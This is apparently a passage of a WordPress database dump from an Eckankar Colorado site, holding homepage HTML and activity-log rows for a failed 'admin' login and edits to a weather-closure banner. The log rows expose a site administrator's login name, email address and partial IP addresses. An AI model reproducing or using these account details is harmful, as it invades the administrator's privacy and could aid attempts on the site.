style=\"transform:rotate(0deg); transition: 0.3s; margin-top: -80px;\" viewBox=\"0 0 1440 100\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\"><defs><linearGradient id=\"sw-gradient-0\" x1=\"0\" x2=\"0\" y1=\"1\" y2=\"0\"><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"0%\"/><stop stop-color=\"rgba(255, 255, 255, 1)\" offset=\"100%\"/></linearGradient></defs><path style=\"transform:translate(0, 0px); opacity:1\" fill=\"url(#sw-gradient-0)\" d=\"M0,10L60,18.3C120,27,240,43,360,41.7C480,40,600,20,720,10C840,0,960,0,1080,5C1200,10,1320,20,1440,23.3C1560,27,1680,23,1800,20C1920,17,2040,13,2160,15C2280,17,2400,23,2520,23.3C2640,23,2760,17,2880,11.7C3000,7,3120,3,3240,6.7C3360,10,3480,20,3600,28.3C3720,37,3840,43,3960,50C4080,57,4200,63,4320,56.7C4440,50,4560,30,4680,26.7C4800,23,4920,37,5040,41.7C5160,47,5280,43,5400,48.3C5520,53,5640,67,5760,75C5880,83,6000,87,6120,80C6240,73,6360,57,6480,41.7C6600,27,6720,13,6840,15C6960,17,7080,33,7200,33.3C7320,33,7440,17,7560,10C7680,3,7800,7,7920,10C8040,13,8160,17,8280,21.7C8400,27,8520,33,8580,36.7L8640,40L8640,100L8580,100C8520,100,8400,100,8280,100C8160,100,8040,100,7920,100C7800,100,7680,100,7560,100C7440,100,7320,100,7200,100C7080,100,6960,100,6840,100C6720,100,6600,100,6480,100C6360,100,6240,100,6120,100C6000,100,5880,100,5760,100C5640,100,5520,100,5400,100C5280,100,5160,100,5040,100C4920,100,4800,100,4680,100C4560,100,4440,100,4320,100C4200,100,4080,100,3960,100C3840,100,3720,100,3600,100C3480,100,3360,100,3240,100C3120,100,3000,100,2880,100C2760,100,2640,100,2520,100C2400,100,2280,100,2160,100C2040,100,1920,100,1800,100C1680,100,1560,100,1440,100C1320,100,1200,100,1080,100C960,100,840,100,720,100C600,100,480,100,360,100C240,100,120,100,60,100L0,100Z\"/></svg>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -274px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237007,40280,'post_type','page'),(237006,40280,'post_id','7160'),(237005,40279,'_server_remote_addr','147.135.255.x'),(237004,40279,'_message_key','user_unknown_login_failed'),(237002,40279,'failed_username','admin'),(237003,40279,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(237001,40278,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236996,40278,'_message_key','post_updated'),(236997,40278,'_user_id','2'),(236998,40278,'_user_login','S8zhaBda'),(236999,40278,'_user_email','nada@zipnadanot.org'),(237000,40278,'_server_remote_addr','76.130.120.x'),(238519,40532,'_user_email','nada@zipnadanot.org'),(238520,40532,'_server_remote_addr','76.130.120.x'),(238521,40532,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238518,40532,'_user_login','S8zhaBda'),(238517,40532,'_user_id','2'),(238516,40532,'_message_key','widget_edited'),(238515,40532,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238514,40532,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238513,40532,'sidebar_id','null'),(238512,40532,'widget_name_translated','Custom HTML'),(238511,40532,'widget_id_base','custom_html'),(238510,40531,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238509,40531,'_server_remote_addr','76.130.120.x'),(238508,40531,'_user_email','nada@zipnadanot.org'),(238507,40531,'_user_login','S8zhaBda'),(238506,40531,'_user_id','2'),(238505,40531,'_message_key','widget_edited'),(238504,40531,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px; box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238614,40541,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(255, 255, 255.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238613,40541,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(0, 0, 0, 0.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238612,40541,'sidebar_id','null'),(238610,40541,'widget_id_base','custom_html'),(238611,40541,'widget_name_translated','Custom HTML'),(238609,40540,'_server_http_referer','https://eckankar-colorado.org/wp-admin/customize.php?url=https%3A%2F%2Feckankar-colorado.org%2F'),(238608,40540,'_server_remote_addr','76.130.120.x'),(238607,40540,'_user_email','nada@zipnadanot.org'),(238605,40540,'_user_id','2'),(238606,40540,'_user_login','S8zhaBda'),(238604,40540,'_message_key','widget_edited'),(238603,40540,'new_instance','{\n    \"title\": \"\",\n    \"content\": \"<div class=\\\"boldgrid-section\\\">\\r\\n<div class=\\\"container\\\">\\r\\n<div class=\\\"row\\\" style=\\\"background-color: #db5656; padding-top: 60px; padding-bottom: 23px;box-shadow: rgba(255, 255, 255.16) 0px 10px 36px 0px, rgba(0, 0, 0, 0.06) 0px 0px 0px 1px;\\\">\\r\\n<div class=\\\"col-lg-12 col-md-12 col-xs-12 col-sm-12\\\">\\r\\n<p class=\\\"bg-font-family-alt color1-color\\\" style=\\\"text-align: center;\\\"><span style=\\\"font-family: arial black, sans-serif; font-size: 24pt;\\\">Weather Alert<\\/span><br>\\r\\n<strong><span style=\\\"font-size: 18pt;\\\">The Colorado ECK Temple is closed today due to weather conditions.<\\/span><\\/strong><\\/p>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\"\n}'),(238602,40540,'old_instance','{\n    \"title\": \"\",\n    \"content\": \"<div 